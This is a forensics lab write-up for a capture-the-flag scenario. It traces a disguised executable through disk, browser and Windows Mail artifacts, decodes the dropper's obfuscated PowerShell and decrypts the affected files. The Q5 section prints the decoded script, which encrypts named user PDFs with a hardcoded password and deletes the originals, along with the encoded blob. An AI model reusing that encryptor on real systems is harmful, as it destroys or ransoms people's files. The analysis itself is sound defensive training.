Scenario
The IMF is hit by a cyber attack compromising sensitive data. Luther sends Ethan to retrieve crucial information from a compromised server. Despite warnings, Ethan downloads the intel, which later becomes unreadable. To recover it, he creates a forensic image and asks Benji for help in decoding the files.
Resources:
- Windows Mail Artifacts: Microsoft HxStore.hxd (email) Research
Q1: What is the MD5 hash of the potentially malicious EXE file the user downloaded?
After opening the downloaded artifacts with FTK Imager, we look for an executable (“.exe”) file that seems malicious.
There is a suspicious file in “/Downloads” called “IMF-Info.pdf.exe”. The double extension is the giveaway: it is an executable dressed up as a PDF, and an exe sitting in the user's Downloads folder is exactly what the question points at.
FTK Imager can hash it for us without extracting the sample: right-click the “/Downloads” directory and choose “Export File Hash List”.
This writes a .csv with the MD5 and SHA1 of every file inside “/Downloads”, which is safer than exporting the malicious file itself just to hash it.
Open the saved .csv file and read the MD5 hash on the “IMF-Info.pdf.exe” row.
Answer1 → 336A7CF476EBC7548C93507339196ABB
Q2: What is the URL from which the file was downloaded?
If you click the “Downloads” directory in FTK Imager, you can see a “Zone.Identifier” entry next to specific files inside the directory. This is the NTFS alternate data stream (the “Mark of the Web”) that Windows attaches to every file downloaded from the Internet zone.
Opening the “Zone.Identifier” stream for “IMF-Info.pdf.exe” gives the download URL in its HostUrl field:
Answer2 → http://192.168.16.128:8000/IMF-Info.pdf.exe
Q3: What application did the user use to download this file?
Viewing the file system hierarchy, we can see the device has the two most common browsers installed, Google Chrome and Microsoft Edge.
So we focus on the History database of each of them (both are Chromium browsers and use the same SQLite schema, so the same queries work on either file):
Google Chrome History file location:
C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History
Microsoft Edge History file location:
C:\Users\<username>\AppData\Local\Microsoft\Edge\User Data\Default\History
After analyzing each file (for example with DB Browser for SQLite), we can see in the urls table of Edge's History that the user accessed the download URL.
The malicious file also shows up in the downloads table of the same Edge History database, while Chrome's History has no trace of it.
Answer3 → Microsoft Edge
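Both artifacts used in Q2 and Q3 (the Zone.Identifier stream and the Chromium History database) can be read programmatically instead of by hand. The following Python is an added example and not part of the original write-up: it parses a Zone.Identifier stream with configparser, then queries a constructed, cut-down copy of the Chromium History schema (Edge and Chrome share it, so attribution comes down to which browser's History file holds the row) to attribute the download to a browser. The sample rows, the ReferrerUrl value, the title and the timestamp are constructed for illustration; on a real image you would point sqlite3 at a copy of the exported History file instead of the in-memory sample.

```python
import configparser
import sqlite3
from datetime import datetime, timedelta, timezone

# Constructed sample of the Zone.Identifier alternate data stream that Windows
# writes next to a file downloaded from the Internet zone (ZoneId=3).
# HostUrl is the value recovered in Q2; ReferrerUrl is an assumed value.
ZONE_IDENTIFIER = """[ZoneTransfer]
ZoneId=3
ReferrerUrl=http://192.168.16.128:8000/
HostUrl=http://192.168.16.128:8000/IMF-Info.pdf.exe
"""

# Chromium stores times as microseconds since 1601-01-01 UTC (WebKit epoch).
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_zone_identifier(text):
    """Return ZoneId, ReferrerUrl and HostUrl from a Zone.Identifier stream."""
    cp = configparser.ConfigParser(interpolation=None)  # URLs may contain '%'
    cp.read_string(text)
    zone = cp["ZoneTransfer"]
    return {
        "zone_id": int(zone.get("ZoneId", "-1")),
        "referrer_url": zone.get("ReferrerUrl"),
        "host_url": zone.get("HostUrl"),
    }


def webkit_to_datetime(microseconds):
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)


def build_sample_history(with_download):
    """Constructed, cut-down copy of the Chromium History schema (only the
    columns queried below are kept). One DB gets the download, one does not."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE urls(id INTEGER PRIMARY KEY, url TEXT, title TEXT,
                          visit_count INTEGER, last_visit_time INTEGER);
        CREATE TABLE downloads(id INTEGER PRIMARY KEY, target_path TEXT,
                               start_time INTEGER, received_bytes INTEGER,
                               state INTEGER, tab_url TEXT, referrer TEXT,
                               mime_type TEXT);
        CREATE TABLE downloads_url_chains(id INTEGER, chain_index INTEGER,
                                          url TEXT, PRIMARY KEY(id, chain_index));
    """)
    if with_download:
        # Constructed timestamp: 13390000000000000 us after 1601 = April 2025.
        ts = 13390000000000000
        db.execute("INSERT INTO urls VALUES (1, ?, ?, 1, ?)",
                   ("http://192.168.16.128:8000/", "constructed title", ts))
        db.execute("INSERT INTO downloads VALUES (1, ?, ?, 204800, 1, ?, ?, ?)",
                   (r"C:\Users\ethan\Downloads\IMF-Info.pdf.exe", ts,
                    "http://192.168.16.128:8000/", "http://192.168.16.128:8000/",
                    "application/octet-stream"))
        db.execute("INSERT INTO downloads_url_chains VALUES (1, 0, ?)",
                   ("http://192.168.16.128:8000/IMF-Info.pdf.exe",))
    db.commit()
    return db


def visited_urls(db, needle):
    """URLs in the urls table containing needle, with their last visit time."""
    rows = db.execute("SELECT url, last_visit_time FROM urls WHERE url LIKE ?",
                      ("%" + needle + "%",))
    return [(url, webkit_to_datetime(t)) for url, t in rows]


def find_download(db, filename):
    """Look a file name up in the downloads table; None if it is not there."""
    row = db.execute("""
        SELECT d.target_path, d.start_time, d.received_bytes, d.state,
               d.tab_url, d.referrer, d.mime_type,
               (SELECT url FROM downloads_url_chains c
                 WHERE c.id = d.id ORDER BY c.chain_index DESC LIMIT 1)
          FROM downloads d
         WHERE d.target_path LIKE ?""", ("%" + filename,)).fetchone()
    if row is None:
        return None
    return {
        "target_path": row[0],
        "start_time": webkit_to_datetime(row[1]),
        "received_bytes": row[2],
        "state": row[3],          # 1 = completed download
        "tab_url": row[4],
        "referrer": row[5],
        "mime_type": row[6],
        "source_url": row[7],     # last hop of the redirect chain
    }


def attribute_download(histories, filename):
    """histories: {browser name: sqlite3 connection}. Returns the browsers
    whose History records the download, mapped to the matching row."""
    return {browser: rec for browser, db in histories.items()
            if (rec := find_download(db, filename)) is not None}


if __name__ == "__main__":
    print("Zone.Identifier:", parse_zone_identifier(ZONE_IDENTIFIER))
    histories = {
        "Microsoft Edge": build_sample_history(with_download=True),
        "Google Chrome": build_sample_history(with_download=False),
    }
    for browser, rec in attribute_download(histories, "IMF-Info.pdf.exe").items():
        print(browser, rec["source_url"], rec["start_time"].isoformat())
```

Against a real image, export both History files, open each with sqlite3.connect and pass them to attribute_download; the browser whose downloads table returns a row is the answer, and source_url from the downloads_url_chains table should agree with the HostUrl in Zone.Identifier.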
Q4: By examining Windows Mail artifacts, we found an email address mentioning three IP addresses of servers that are at risk or compromised. What are the IP addresses?
This question is tricky: it is not about pulling the email databases or messages out of “/comm”. It is about reading the scenario again and understanding why the scenario resources point at this article:
Resources:
- Windows Mail Artifacts: Microsoft HxStore.hxd (email) Research
After reading that article, we know the Windows Mail app keeps mail content in the “hxStore.hxd” store, so we need to get that “.hxd” file and analyze it with a hex editor, in this case “HxD”.
The “.hxd” file is at the following path:
C:\Users\<username>\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\hxStore.hxd
Export it from FTK Imager (right-click → “Export Files”) and analyze the exported copy with “HxD”.
Open the exported file in “HxD”; the header matches the one described in the article.
The remaining question is how to search the store for IP addresses. Use Search → Find with an IP-address pattern, tick “Search all” and go through all of the search hits:
Double-click the highlighted (blue) search hit and the three IP addresses are right there in the message text:
Answer4 → 145.67.29.88, 212.33.10.112, 192.168.16.128
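The manual HxD search above, and the later strings pass over the executable, can be scripted. The following Python is an added example, not from the write-up: it carves IPv4 literals out of a binary blob in both ASCII and UTF-16LE (Windows applications commonly store text as UTF-16LE, which is why a plain ASCII search can miss strings), validates the octet range so that junk such as 999.1.1.1 is dropped, and reports the offset and encoding of every hit so you can jump straight to it in HxD. The blob below is a constructed stand-in for a slice of the store, not real data from the lab.

```python
import re

# Dotted-quad candidates in ASCII text, and in UTF-16LE where every character is
# followed by a 0x00 byte. Lookarounds reject quads embedded in longer dotted
# runs (e.g. 1.2.3.4.5); the octet range is checked afterwards, not in the regex.
_ASCII_QUAD = re.compile(
    rb"(?<!\d)(?<!\d\.)\d{1,3}(?:\.\d{1,3}){3}(?!\d)(?!\.\d)"
)
_UTF16LE_QUAD = re.compile(
    rb"(?<!\d\x00)(?<!\d\x00\.\x00)"
    rb"(?:\d\x00){1,3}(?:\.\x00(?:\d\x00){1,3}){3}"
    rb"(?!\d\x00)(?!\.\x00\d\x00)"
)


def _valid_quad(text):
    octets = text.split(".")
    return len(octets) == 4 and all(o.isdigit() and 0 <= int(o) <= 255 for o in octets)


def carve_ipv4(blob):
    """Return [(offset, encoding, ip)] for every valid IPv4 literal in blob,
    sorted by offset. Offsets are into the original bytes, so they can be used
    directly as 'go to offset' targets in a hex editor."""
    hits = []
    for m in _ASCII_QUAD.finditer(blob):
        text = m.group(0).decode("ascii")
        if _valid_quad(text):
            hits.append((m.start(), "ascii", text))
    for m in _UTF16LE_QUAD.finditer(blob):
        text = m.group(0).decode("utf-16-le")
        if _valid_quad(text):
            hits.append((m.start(), "utf-16-le", text))
    return sorted(hits)


def unique_ips(blob):
    """Deduplicated, sorted list of the addresses found by carve_ipv4."""
    return sorted({ip for _, _, ip in carve_ipv4(blob)})


# Constructed stand-in for a slice of hxStore.hxd: binary noise, a UTF-16LE
# message body naming two servers, an ASCII URL carrying a third address, and
# an out-of-range quad (999.1.1.1) that must be rejected.
SAMPLE_BLOB = (
    b"\x00\x01\x02\xff\xfe" * 4
    + "Compromised servers: 145.67.29.88 and 212.33.10.112.".encode("utf-16-le")
    + b"\x00" * 8
    + b"http://192.168.16.128:8000/IMF-Info.pdf.exe"
    + b"\x00 build 999.1.1.1 \x00"
)


def carve_file(path):
    """Convenience wrapper: carve a file on disk (e.g. the exported hxStore.hxd)."""
    with open(path, "rb") as fh:
        return carve_ipv4(fh.read())


if __name__ == "__main__":
    for offset, encoding, ip in carve_ipv4(SAMPLE_BLOB):
        print(f"0x{offset:08x}  {encoding:<9}  {ip}")
    print("unique:", unique_ips(SAMPLE_BLOB))
```

Run carve_file on the exported hxStore.hxd and you get every address in the store with its offset; the hits still need triage (version strings and timestamps can look like dotted quads), which is why the offsets are reported rather than only the deduplicated list.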
Q5: By examining the malicious executable, we found that it uses an obfuscated script to decrypt specific files.
What predefined password does the script use for encryption?
At this stage we need to export the malicious file and run static analysis on it (do this in an isolated, safe environment, and never double-click the sample).
After exporting the sample, run “strings” on it (here the Sysinternals strings.exe) and redirect the output to a text file with a command like this:
.\strings.exe "D:\CYBERDEFENDERS\Silent_Breach\Downloads\IMF-Info.pdf.exe" > file.txt
Open the output file in Notepad++ for a better view and look for anything that stands out. Found nothing at all, to be honest :(
Next idea: look at the analysis of the sample on VirusTotal. Search for it by the MD5 from Q1 (searching by hash avoids uploading the sample, which would make it public) and check which crowdsourced YARA and Sigma rules matched.
Any of the high-severity crowdsourced Sigma rule matches will lead you there. These come from VirusTotal's sandbox run of the sample, so they describe its behaviour rather than its static content: open the “View matches” tab and read the full command line that was executed:
This .ps1 file looks very suspicious, so let's go back to the strings output we exported with the “strings” tool and search for “Gz3m6mG3j2TyAqF2Zx4v.ps1” in Notepad++.
That makes sense, since the question says the executable uses a script: “Gz3m6mG3j2TyAqF2Zx4v.ps1” is a PowerShell script, so we could also simply have searched the strings output for “.ps1” and landed on the same spot.
There is only one hit, and the obfuscated code sits right below the “Gz3m6mG3j2TyAqF2Zx4v.ps1” string.
So, a few lines of Python are enough to deobfuscate that very long string starting with “K0QfK0QZjJ3bG1CIl” (the dropper's own decoding logic reverses the string and then Base64-decodes it, so we do the same):
import base64
obfuscated = """K0QfK0QZjJ3bG1CIlxWaGRXdw5WakASblRXStUmdv1WZSBCIgAiCNoQDpgSZz9GbD5SbhVmc0NFd19GJgACIgoQDpgSZz9GbD5SbhVmc0N1b0BXeyNGJgACIgoQDK0QKos2YvxmQsFmbpZEazVHbG5SbhVmc0N1b0BXeyNGJgACIgoQDpgGdn5WZM5yclRXeC5WahxGckACLwACLzVGd5JkbpFGbwRCKlRXaydlLtFWZyR3UvRHc5J3YkACIgAiCNoQDpUGdpJ3V6oTXlR2bN1WYlJHdT9GdwlncD5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBCLy9Gdwlncj5WZkACLtFWZyR3U0V3bkgSbhVmc0N1b0BXeyNkL5hGchJ3ZvRHc5J3QukHdpJXdjV2Uu0WZ0NXeTBCdjVmai9UL3VmTg0DItFWZyR3UvRHc5J3YkACIgAiCNkSZ0FWZyNkO60VZk9WTlxWaG5yTJ5SblR3c5N1WgwSZslmR0VHc0V3bkgSbhVmc0NVZslmRu8USu0WZ0NXeTBCdjVmai9UL3VmTg0DItFWZyR3U0V3bkACIgAiCNoQDpUGbpZEd1BnbpRCKzVGd5JEbsFEZhVmU6oTXlxWaG5yTJ5SblR3c5N1Wg0DIzVGd5JkbpFGbwRCIgACIK0gCNkCKy9Gdwlncj5WRlRXYlJ3QuMXZhRCI9AicvRHc5J3YuVGJgACIgoQDK0wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1Wg0DIn5WakRWYQ5yclFGJgACIgoQDDJ0Q6oTXlR2bNJXZoBXaD5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBSPgUGZv1kLzVWYkACIgAiCNYXakASPgYVSuMXZhRCIgACIK0QeltGJg0DI5V2SuMXZhRCIgACIK0QKoUGdhVmcDpjOdNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBSPgMXZhRCIgACIK0gCNcyYuVmLnACLnQiZkBnLcdCIlNWYsBXZy1CIlxWaGRXdw5WakASPgUGbpZEd1BHd19GJgACIgoQD7BSKzVGbpZEd1BnbpRCIulGIlxWaGRXdw5WakgCIoNWYlJ3bmpQDK0QKK0gImRGcu42bpN3cp1ULG1UScxFcvR3azVGRcxlbhhGdlxFXzJXZzVFXcpzQiACIgAiCNwiImRGcuQXZyNWZT1iRNlEXcB3b0t2clREXc5WYoRXZcx1cyV2cVxFX6MkIgACIgoQDoAEI9AyclxWaGRXdw5WakoQDzVGbpZGI0VHculGIm9GI0NXaMByIK0gCNkSZ6l2U2lGJoMXZ0lnQ0V2RuMXZ0lnQlZXayVGZkASPgYXakoQDpUmepNVeltGJoMXZ0lnQ0V2RuMXZ0lnQlZXayVGZkASPgkXZrRiCNkycu9Wa0FmclRXakACL0xWYzRCIsQmcvd3czFGckgyclRXeCVmdpJXZEhTO4IzYmJlL5hGchJ3ZvRHc5J3QukHdpJXdjV2Uu0WZ0NXeTBCdjVmai9UL3VmTg0DIzVGd5JUZ2lmclRGJK0gCNAiNxASPgUmepNldpRiCNACIgIzMg0DIlpXaTlXZrRiCNADMwATMg0DIz52bpRXYyVGdpRiCNkCOwgHMscDM4BDL2ADewwSNwgHMsQDM4BDLzADewwiMwgHMsEDM4BDKd11WlRXeCtFI9ACdsF2ckoQDiQyYlNVNyAjMj8mZuFiZtlkIg0DIkJ3b3N3chBHJ"""
# Reverse it (the obfuscated blob is Base64 written backwards)
reversed_base64 = obfuscated[::-1]
# Decode from Base64
decoded = base64.b64decode(reversed_base64)
# Try to print the result as UTF-8
try:
    print(decoded.decode('utf-8'))
except UnicodeDecodeError:
    print("[!] Could not decode fully. Might be binary or further obfuscated.")
Alternatively, use CyberChef. Reading the obfuscated code shows that it reverses the long string and then decodes it with Base64, so build the same recipe in the same order (“Reverse”, then “From Base64”) and paste in the very long string that starts with “K0QfK0QZjJ3bG1CIl”:
# ====================================
# Decoded Powershell script
# ====================================
$password = "Imf!nfo#2025Sec$"
$salt = [Byte[]](0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08)
$iterations = 10000
$keySize = 32
$ivSize = 16
$deriveBytes = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($password, $salt, $iterations)
$key = $deriveBytes.GetBytes($keySize)
$iv = $deriveBytes.GetBytes($ivSize)
# List of input files
$inputFiles = @(
    "C:\\Users\\ethan\\Desktop\\IMF-Secret.pdf",
    "C:\\Users\\ethan\\Desktop\\IMF-Mission.pdf"
)
foreach ($inputFile in $inputFiles) {
    $outputFile = $inputFile -replace '\.pdf$', '.enc'
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $key
    $aes.IV = $iv
    $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $encryptor = $aes.CreateEncryptor()
    $plainBytes = [System.IO.File]::ReadAllBytes($inputFile)
    $outStream = New-Object System.IO.FileStream($outputFile, [System.IO.FileMode]::Create)
    $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($outStream, $encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
    $cryptoStream.Write($plainBytes, 0, $plainBytes.Length)
    $cryptoStream.FlushFinalBlock()
    $cryptoStream.Close()
    $outStream.Close()
    Remove-Item $inputFile -Force
}
Answer5 → Imf!nfo#2025Sec$
Q6: After identifying how the script works, decrypt the files and submit the secret string.
Now we need to decrypt the encrypted files. These are the files on the user's “/Desktop”:
Export the encrypted files ending in “.enc” and try to decrypt them. The decoded script gives us everything we need: the password, the salt, the iteration count, the order in which key and IV are derived, and the cipher mode and padding (AES-CBC with PKCS7).
With a little help from ChatGPT, we can write a PowerShell script that mirrors that routine to decrypt the dropped encrypted files:
# ====================================
# AES Decryption Script for .enc Files
# ====================================
# --- Configuration (taken from the decoded script) ---
$password = "Imf!nfo#2025Sec$"
$salt = [Byte[]](0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08)
$iterations = 10000
$keySize = 32
$ivSize = 16

# --- Derive Key and IV ---
# Rfc2898DeriveBytes is PBKDF2-HMAC-SHA1. The GetBytes() calls must be made in
# the same order as the encryptor did (key first, then IV), because each call
# continues the same derived byte stream.
$deriveBytes = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($password, $salt, $iterations)
$key = $deriveBytes.GetBytes($keySize)
$iv = $deriveBytes.GetBytes($ivSize)

# --- Input Files (Update these paths) ---
$inputFiles = @(
    "D:\CYBERDEFENDERS\Silent_Breach\IMF-Secret.enc",
    "D:\CYBERDEFENDERS\Silent_Breach\IMF-Mission.enc"
)

foreach ($encFile in $inputFiles) {
    if (-not (Test-Path $encFile)) {
        Write-Warning "File not found: $encFile"
        continue
    }

    # Generate output path: replace .enc with .decrypted.pdf
    $outputFile = $encFile -replace '\.enc$', '.decrypted.pdf'

    try {
        # Set up AES decryption with the same mode and padding the encryptor used
        $aes = [System.Security.Cryptography.Aes]::Create()
        $aes.Key = $key
        $aes.IV = $iv
        $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $decryptor = $aes.CreateDecryptor()

        # Read encrypted data
        $cipherBytes = [System.IO.File]::ReadAllBytes($encFile)

        # Stream the ciphertext through the decryptor. CopyTo() reads until the
        # CryptoStream reports end of data, so no single Read() length guess is needed.
        $inStream = [System.IO.MemoryStream]::new([byte[]] $cipherBytes)
        $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($inStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
        $plainStream = New-Object System.IO.MemoryStream
        $cryptoStream.CopyTo($plainStream)
        $cryptoStream.Close()
        $inStream.Close()

        [System.IO.File]::WriteAllBytes($outputFile, $plainStream.ToArray())
        Write-Host "✅ Decrypted: $outputFile" -ForegroundColor Green
    }
    catch {
        # A wrong password, salt or iteration count usually surfaces here as a padding error
        Write-Error "❌ Failed to decrypt $encFile. Error: $_"
    }
}
To run this script, allow script execution for the current session only and then invoke it:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
# lets only this PowerShell session run unsigned scripts; nothing is changed machine-wide
./decrypt.ps1
# runs the decryption script
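To make the key-derivation detail from Q5 explicit and to have a second, cross-platform decryptor for Q6, here is an added Python example (not the author's script; it needs the cryptography package). It replicates Rfc2898DeriveBytes exactly, which is PBKDF2-HMAC-SHA1 over the UTF-8 password with the key and the IV taken back-to-back from one 48-byte output stream, then performs the AES-256-CBC/PKCS7 decryption and checks the result for a PDF header. The password, salt and iteration count are the ones recovered from the decoded script; the sample plaintext is constructed and is not the challenge file.

```python
import hashlib
from pathlib import Path

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Parameters lifted from the decoded script.
PASSWORD = "Imf!nfo#2025Sec$"
SALT = bytes([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08])
ITERATIONS = 10000
KEY_SIZE = 32   # AES-256
IV_SIZE = 16    # one AES block


def derive_key_iv(password=PASSWORD, salt=SALT, iterations=ITERATIONS):
    """Replicate Rfc2898DeriveBytes(password, salt, iterations) followed by
    GetBytes(32) and then GetBytes(16).

    Rfc2898DeriveBytes is PBKDF2-HMAC-SHA1 over the UTF-8 password, and each
    GetBytes() call continues the same output stream, so the IV is bytes 32..47
    of one 48-byte derivation. Deriving key and IV with two independent PBKDF2
    calls (each starting at byte 0) is the common mistake: PBKDF2 output is
    prefix-consistent, so the IV would equal the first 16 key bytes and the
    first plaintext block would come out as garbage."""
    stream = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt,
                                 iterations, dklen=KEY_SIZE + IV_SIZE)
    return stream[:KEY_SIZE], stream[KEY_SIZE:]


def encrypt_like_script(plaintext, password=PASSWORD):
    """AES-256-CBC with PKCS7 padding, as the dropped .ps1 does it."""
    key, iv = derive_key_iv(password)
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext) + padder.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return enc.update(padded) + enc.finalize()


def decrypt_enc(ciphertext, password=PASSWORD):
    """Inverse of encrypt_like_script. Raises ValueError on a truncated
    ciphertext or (almost always) on a wrong password, via bad PKCS7 padding."""
    if len(ciphertext) % 16:
        raise ValueError("ciphertext length is not a multiple of the AES block size")
    key, iv = derive_key_iv(password)
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def looks_like_pdf(data):
    return data.startswith(b"%PDF-")


def decrypt_file(enc_path, password=PASSWORD):
    """Decrypt <name>.enc to <name>.decrypted.pdf and return the output path."""
    enc_path = Path(enc_path)
    plain = decrypt_enc(enc_path.read_bytes(), password)
    if not looks_like_pdf(plain):
        print(f"[!] {enc_path.name}: decrypted, but no %PDF- header; check the parameters")
    out = enc_path.with_name(enc_path.stem + ".decrypted.pdf")
    out.write_bytes(plain)
    return out


# Constructed plaintext standing in for IMF-Mission.pdf; not the real file.
SAMPLE_PDF = b"%PDF-1.4\n% constructed sample, not the challenge file\n%%EOF\n"

if __name__ == "__main__":
    ct = encrypt_like_script(SAMPLE_PDF)
    pt = decrypt_enc(ct)
    print("round trip ok:", pt == SAMPLE_PDF, "| PDF header:", looks_like_pdf(pt))
    for enc in Path(".").glob("*.enc"):
        print("decrypted", enc, "->", decrypt_file(enc))
```

Drop the exported IMF-Secret.enc and IMF-Mission.enc next to the script and run it; the %PDF- check is the quick sanity test that the password, salt, iteration count and key/IV order all matched, since a wrong IV alone only corrupts the first 16 bytes and would leave a mostly readable file with a broken header.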
Finally, open the decrypted PDF files. The flag is hidden in the decrypted IMF-Mission.pdf.